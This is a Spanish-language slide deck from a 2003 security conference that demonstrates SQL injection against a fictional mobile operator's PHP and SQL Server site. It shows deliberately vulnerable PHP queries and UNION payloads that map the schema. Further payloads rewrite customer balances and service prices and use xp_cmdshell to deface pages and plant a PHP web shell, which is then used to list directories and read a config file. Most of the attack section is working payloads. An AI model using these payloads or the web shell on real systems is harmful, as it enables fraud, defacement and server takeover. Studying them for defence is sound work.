© Rafael San Miguel Carrasco
SQL Injection
FIST Conference October 2003 @
2© Rafael San Miguel Carrasco, [email protected]
SQL Injection
Escenario:
Windows 2000 Professional
Apache Win32 1.3.28
PHP 4.3.3
SQL Server 2000
Documentos HTML y scripts PHP
3© Rafael San Miguel Carrasco, [email protected]
SQL Injection
Operadora de móviles, servicios online:
consulta de saldo
contratación de teleservicios
A través de un identificador secreto asignado a cada cliente, que se utiliza para consultar información y como medio de pago.
9© Rafael San Miguel Carrasco, [email protected]
SQL Injection
consultasaldo.php:
$query = "SELECT nombre, apellidos, saldo FROM clientes WHERE id='$idcliente';"; $result = mssql_query ($query); $nfilas = mssql_num_rows ($result); while ($row = mssql_fetch_array ($result) ) {
echo "Nombre del cliente: <b>" . $row[0] . " " . $row[1] . "</b><br>"; echo "Saldo actual: <b>" . $row[2] . "</b>";
}
10© Rafael San Miguel Carrasco, [email protected]
SQL Injection
contratar.php:
$query = "SELECT * FROM servicios WHERE id='$idservicio';"; $result = mssql_query ($query); $row = mssql_fetch_array ($result);$precio = $row [3]; echo "El precio del servicio que desea contratar es de <b>$precio</b> euros<br>"; $saldo_final = $saldo_actual - $precio; $query = "UPDATE clientes SET saldo=$saldo_final WHERE id='$idcliente';"; mssql_query ($query); $query = "UPDATE clientes SET servicio" . $idservicio. "=1 WHERE id='$idcliente';"; mssql_query ($query);
11© Rafael San Miguel Carrasco, [email protected]
SQL Injection
Mapear la base de datos:
tablas que componen la base de datos
listado y tipo de las columnas de cada tabla
12© Rafael San Miguel Carrasco, [email protected]
SQL Injection
5' AND 1=0 union select TABLE_NAME from
INFORMATION_SCHEMA.TABLES—
Warning: mssql_query(): message: Todas las consultas de una instruccion SQL que contenga un operador UNION deben tener el mismo numero de expresiones en sus listas de destino. (severity 16) in c:\apache\htdocs\consultasaldo.php on line 21
5‘ AND 1=0 union select TABLE_NAME," ",1 from
INFORMATION_SCHEMA.TABLES--
13© Rafael San Miguel Carrasco, [email protected]
SQL Injection
14© Rafael San Miguel Carrasco, [email protected]
SQL Injection
5‘ AND 1=0 union select TABLE_NAME, COLUMN_NAME,1 from INFORMATION_SCHEMA.COLUMNS
15© Rafael San Miguel Carrasco, [email protected]
SQL Injection
5‘ AND 1=0 union select TABLE_NAME, COLUMN_NAME,type from syscolumns, INFORMATION_SCHEMA.COLUMNS—
16© Rafael San Miguel Carrasco, [email protected]
SQL Injection
5‘ AND 1=0; update clientes set saldo=500000 where id=5555--
17© Rafael San Miguel Carrasco, [email protected]
SQL Injection
5556'; update servicios set precio=1 where nombre_servicio="llamada en espera"—
18© Rafael San Miguel Carrasco, [email protected]
SQL Injection
Warning: mssql_query(): message: Linea 1: sintaxis incorrecta cerca de '—'. (severity 15) in c:\apache\htdocs\contratar.php on line 22
Warning: mssql_query(): message: Comilla no cerrada antes de la cadena de caracteres ';'. (severity 15) in c:\apache\htdocs\contratar.php on line 22
19© Rafael San Miguel Carrasco, [email protected]
SQL Injection
5‘ AND 1=0; exec master..xp_cmdshell 'echo "<html> <body><img src=http://www.geocities.com/clan_de_vampiros/Caminante.gif> <br>hackedwebpage!</body></html>" > c:\apache\htdocs\deface.htm'—
5556’; exec master..xp_cmdshell ‘copy c:\apache\htdocs\deface.htm
c:\apache\htdocs\principal.htm’—
20© Rafael San Miguel Carrasco, [email protected]
SQL Injection
21© Rafael San Miguel Carrasco, [email protected]
SQL Injection
<html><body><?php$comando = $_GET["comando"];echo "$comando<br>";$resultado = system ($comando);echo $resultado;?></body></html>
shell.php:
O también: passthru ()
22© Rafael San Miguel Carrasco, [email protected]
SQL Injection
5556'; exec master..xp_cmdshell 'echo "<html><body><?php $comando=$_GET["comando"];echo $comando;$resultado = system ($comando);echo $resultado;?></body></html>" > c:\apache\htdocs\shell.php'--
http://127.0.0.1/shell.php?comando=dir..
23© Rafael San Miguel Carrasco, [email protected]
SQL Injection
http://127.0.0.1/shell.php?comando=type c:\odbc.conf
24© Rafael San Miguel Carrasco, [email protected]
SQL Injection
En php.ini:
; Magic quotes for incoming ; GET/POST/Cookie data.magic_quotes_gpc = On / Off
Sin embargo, con campos numéricos esta protección es inútil
© Rafael San Miguel Carrasco
Madrid, 25 October 2003
FIST Conference October 2003
SQL Injection
Top Related